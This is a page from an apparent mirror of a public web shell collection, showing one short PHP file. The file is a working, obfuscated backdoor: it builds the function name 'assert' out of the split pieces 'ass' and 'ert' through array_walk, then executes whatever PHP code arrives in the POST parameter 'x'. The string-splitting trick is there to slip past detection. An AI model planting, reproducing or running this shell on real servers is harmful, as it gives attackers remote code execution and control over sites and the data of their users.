mirror of
https://github.com/tennc/webshell
synced 2024-11-22 11:13:03 +00:00
10 lines
165 B
PHP
10 lines
165 B
PHP
|
<?php
|
||
|
function sqlsec($value,$key)
|
||
|
{
|
||
|
$x = $key.$value;
|
||
|
$x($_POST['x']);
|
||
|
}
|
||
|
$a=array("ass"=>"ert");
|
||
|
array_walk($a,"sqlsec");
|
||
|
?>
|